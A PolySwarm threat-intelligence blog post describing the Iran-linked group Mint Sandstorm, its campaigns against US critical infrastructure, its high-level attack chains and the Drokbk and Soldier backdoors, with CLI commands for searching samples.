The PolySwarm Blog

Analyze suspicious files and URLs, at scale, millions of times per day. Get real-time threat intel from a crowdsourced network of security experts and antivirus companies competing to protect you.

Mint Sandstorm Targets US Critical Infrastructure

May 1, 2023 3:22:04 PM / by The Hivemind

mintSandstormRelated Families: Drokbk, Soldier
Verticals Targeted:
Critical Infrastructure, Telecommunications, Government, Energy, Transportation. Utilities, Oil & Gas

Executive Summary

Mint Sandstorm was recently observed targeting US critical infrastructure entities. These include seaports, energy companies, transportation systems, and a US utility and gas entity.

Key Takeaways

  • Mint Sandstorm was recently observed targeting US critical infrastructure entities.
  • Mint Sandstorm is an Iran nexus threat actor group associated with the Iranian Revolutionary Guard Corps.
  • The threat actors use a combination of phishing, common exploits, and custom tools.

The Campaign

Microsoft recently reported on a nation-state cyber-espionage group, dubbed Mint Sandstorm (formerly Phosphorus), which has been targeting US critical infrastructure entities.

Mint Sandstorm is believed to be associated with the Iranian government and has been using a combination of social engineering, spear-phishing, and common exploits to gain access to its targets' networks. The group has been particularly successful in targeting organizations in the telecommunications and government sectors, as well as energy and transportation sector entities.

Microsoft notes Mint Sandstorm's tactics, techniques, and procedures (TTPs) have evolved over time, reflecting the group's commitment to improving its tradecraft. For example, the group has developed custom malware and improved its phishing emails to make them more convincing.

In recent campaigns, a Mint Sandstorm subgroup has leveraged N-day vulnerabilities in enterprise applications and used targeted phishing to gain access to victim networks successfully. This subgroup has more mature operational capabilities than others under the overall Mint Sandstorm umbrella. From late 2021 to mid-2022, the group began targeting US critical infrastructure, such as seaports, energy companies, transportation systems, and a US utility and gas entity. Earlier this year, the subgroup began leveraging CVE-20922-47966 and CVE-2022-47986 shortly after the POCs were made publicly available.

After obtaining access to a victim network, the threat actors deploy a custom PowerShell script to use in the discovery process. If the victim does not meet targeting requirements or is not deemed of high enough value, the threat actors seem to halt further action. If they continue to pursue the victim, one of two attack chains is employed.

In the first attack chain, the threat actors move laterally using Impacket and leverage PowerShell scripts to enumerate admin accounts and enable RDP. They then use an SSH tunnel for C2. The main objective in this attack chain seems to be the theft of the Active Directory database. The threat actors can then use these credentials for further access and for social engineering.

In the second attack chain, the threat actors use Impacket for lateral movement, use webhook[.]site for C2, and use scheduled tasks to maintain persistence. They deploy Drokbk, Soldier, or another custom malware variant as the final payload. Drokbk is a custom .NET implant containing an installer and a backdoor payload. The soldier is a multistage .NET backdoor capable of downloading and running additional tools and uninstalling itself.

Who is Mint Sandstorm?

Mint Sandstorm, also known as Phosphorus, APT35, Charming Kitten, Ajax Security, and NewsBeef, is an Iran nexus threat actor group active since at least 2014. The group is thought to operate on behalf of the Iranian government, with ties to the Iranian Revolutionary Guard Corps. Mint Sandstorm has previously targeted government and military personnel, academics, journalists, and the World Health Organization. Targets were mostly located in the US and the Middle East.

Mint Sandstorm TTPs include but are not limited to social engineering, use of compromised email accounts, targeted phishing attacks, using Amazon S3 buckets and IRC for C2, leveraging Log4j vulnerabilities, watering hole attacks, Havij, sqlmap, Metasploit, Mimikatz, CharmPower, DownPaper, PsExec, and Pupy. Mint Sandstorm is known for its moderate skill level, easily recognizable TTPs, expansive infrastructure, and notoriously sloppy OPSEC.

IOCs

PolySwarm is monitoring for samples of Drokbk and Soldier.

You can use the following CLI command to search for all Drokbk samples in our portal when available: $ polyswarm link list -f Drokbk

You can use the following CLI command to search for all Soldier samples in our portal when available: $ polyswarm link list -f Soldier

Don’t have a PolySwarm account? Go here to sign up for a free Community plan or to subscribe.

Contact us at hivemind@polyswarm.io | Check out our blog | Subscribe to our reports


Topics: Threat Bulletin, Middle East, Government, Critical Infrastructure, Iran, Telecommunications, Charming Kitten, MENA, Energy, Mint Sandstorm, North Africa, Transportation

The Hivemind

Written by The Hivemind

Subscribe to Email Updates

Lists by Topic

see all

Posts by Topic

See all

Recent Posts